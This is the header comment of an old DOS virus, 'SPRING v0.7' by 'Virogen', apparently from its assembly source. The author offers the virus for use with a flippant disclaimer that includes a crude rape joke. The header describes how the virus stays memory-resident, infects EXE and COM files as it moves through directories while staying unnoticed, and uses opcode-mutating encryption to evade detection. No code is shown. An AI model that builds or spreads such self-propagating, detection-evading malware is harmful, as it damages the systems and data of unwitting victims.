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SPRING v0.7 - BY Virogen - 05/26/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y latest viral creation. Don't blame me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ant fool and infect yourself. Don't blame me if you "acciden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 somebody else. Don't blame me if you rape your little s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don't blame me for anything, and use this vir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s compatible with A86. You'll have to add a few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and such to make it compat. with TASM, MASM, and suc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I sufficiently commented the source code, it should be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: PSRhA  - Parastic &amp; Spawning Resident  -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: Virogen's viru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on Method :  Once memory resident, the virus infects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e current directory everytim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ies or drives. So,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re coming OUT of will be infected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ould be the best way, maybe it won't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noticable to the victim. Anyway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ect EXE files (spawning) in directory, o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E files have been infected, it moves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(para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:  The base of the encryption of this viru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 technique. However, the encryption code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, the ops are modified directly, a f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sizes, and bytes between unmodified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to a chracter from a set of harmless op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ytes that do remain constant are not adjacent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2 bytes) and change positions. Not anything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azing, and the encryption routine alway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ique. Maybe I'll improve this in lat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figured this'll d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Faithful Com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